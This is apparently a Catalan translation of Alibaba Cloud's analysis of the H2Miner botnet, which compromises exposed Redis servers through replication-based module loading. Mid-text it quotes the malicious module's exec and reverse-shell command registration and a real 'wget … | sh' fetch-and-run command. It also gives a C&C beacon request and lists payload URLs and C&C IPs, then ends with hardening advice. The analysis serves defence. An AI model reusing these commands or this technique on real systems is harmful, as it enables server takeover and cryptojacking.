Fa un dia, un dels servidors del meu projecte va ser atacat per un cuc similar. A la recerca d'una resposta a la pregunta "què va ser això?" He trobat un gran article de l'equip de seguretat al núvol d'Alibaba. Com que no he trobat aquest article sobre Habré, he decidit traduir-lo especialment per a tu <3
Entrada
Recentment, l'equip de seguretat d'Alibaba Cloud va descobrir un brot sobtat d'H2Miner. Aquest tipus de cuc maliciós utilitza la manca d'autorització o les contrasenyes febles per a Redis com a passarel·les als vostres sistemes, després de la qual cosa sincronitza el seu propi mòdul maliciós amb l'esclau mitjançant la sincronització mestre-esclau i finalment descarrega aquest mòdul maliciós a la màquina atacada i executa programes maliciosos. instruccions.
En el passat, els atacs als vostres sistemes es portaven a terme principalment mitjançant un mètode que implicava tasques programades o claus SSH que es van escriure a la vostra màquina després que l'atacant iniciés sessió a Redis. Afortunadament, aquest mètode no es pot utilitzar sovint per problemes amb el control de permisos o per diferents versions del sistema. Tanmateix, aquest mètode de càrrega d'un mòdul maliciós pot executar directament les ordres de l'atacant o accedir a l'intèrpret d'ordres, cosa que és perillós per al vostre sistema.
A causa del gran nombre de servidors Redis allotjats a Internet (prop d'un milió), l'equip de seguretat d'Alibaba Cloud, com a recordatori amigable, recomana que els usuaris no comparteixin Redis en línia i comprovin regularment la força de les seves contrasenyes i si estan compromeses. selecció ràpida.
H2Miner
H2Miner és una botnet de mineria per a sistemes basats en Linux que pot envair el vostre sistema de diverses maneres, inclosa la manca d'autorització en les vulnerabilitats d'execució de comandaments remots (RCE) Hadoop yarn, Docker i Redis. Una botnet funciona baixant scripts i programari maliciós per explotar les vostres dades, expandir l'atac horitzontalment i mantenir comunicacions de comandament i control (C&C).
Redis RCE
El coneixement sobre aquest tema va ser compartit per Pavel Toporkov a ZeroNights 2018. Després de la versió 4.0, Redis admet una funció de càrrega de connectors que ofereix als usuaris la possibilitat de carregar fitxers compilats amb C a Redis per executar ordres específiques de Redis. Aquesta funció, encara que útil, conté una vulnerabilitat en la qual, en mode mestre-esclau, els fitxers es poden sincronitzar amb l'esclau mitjançant el mode de resincronització completa. Això pot ser utilitzat per un atacant per transferir fitxers maliciosos. Un cop finalitzada la transferència, els atacants carreguen el mòdul a la instància de Redis atacada i executen qualsevol ordre.
Anàlisi de cucs de programari maliciós
Recentment, l'equip de seguretat d'Alibaba Cloud va descobrir que la mida del grup de miners maliciosos H2Miner ha augmentat sobtadament de manera espectacular. Segons l'anàlisi, el procés general d'ocurrència de l'atac és el següent:
H2Miner utilitza RCE Redis per a un atac de ple dret. Els atacants ataquen primer servidors Redis desprotegits o servidors amb contrasenyes febles.
Després fan servir l'ordre config set dbfilename red2.so per canviar el nom del fitxer. Després d'això, els atacants executen l'ordre slaveof per establir l'adreça de l'amfitrió de replicació mestre-esclau.
Quan la instància de Redis atacada estableix una connexió mestre-esclau amb el Redis maliciós que és propietat de l'atacant, l'atacant envia el mòdul infectat mitjançant l'ordre fullresync per sincronitzar els fitxers. Aleshores, el fitxer red2.so es baixarà a la màquina atacada. Aleshores, els atacants utilitzen el mòdul de càrrega ./red2.so per carregar aquest fitxer so. El mòdul pot executar ordres d'un atacant o iniciar una connexió inversa (porta posterior) per accedir a la màquina atacada.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Després d'executar una ordre maliciosa com ara / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, l'atacant restablirà el nom del fitxer de còpia de seguretat i descarregarà el mòdul del sistema per netejar els rastres. Tanmateix, el fitxer red2.so encara romandrà a la màquina atacada. Es recomana als usuaris que prestin atenció a la presència d'un fitxer sospitós a la carpeta de la seva instància Redis.
A més de matar alguns processos maliciosos per robar recursos, l'atacant va seguir un script maliciós baixant i executant fitxers binaris maliciosos per . Això vol dir que el nom del procés o el nom del directori que conté kinsing a l'amfitrió pot indicar que aquesta màquina ha estat infectada per aquest virus.
Segons els resultats de l'enginyeria inversa, el programari maliciós realitza principalment les funcions següents:
- Pujar fitxers i executar-los
- Mineria
- Mantenir la comunicació C&C i executar ordres de l'atacant
Utilitzeu masscan per a l'escaneig extern per ampliar la vostra influència. A més, l'adreça IP del servidor C&C està codificada en dur al programa i l'amfitrió atacat es comunicarà amb el servidor de comunicació C&C mitjançant peticions HTTP, on la informació del zombi (servidor compromès) s'identifica a la capçalera HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Altres mètodes d'atac
Adreces i enllaços utilitzats pel cuc
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Consell
En primer lloc, Redis no hauria de ser accessible des d'Internet i s'hauria de protegir amb una contrasenya segura. També és important que els clients comprovin que no hi hagi cap fitxer red2.so al directori Redis i que no hi hagi cap "kinsing" al nom del fitxer/procés de l'amfitrió.
Font: www.habr.com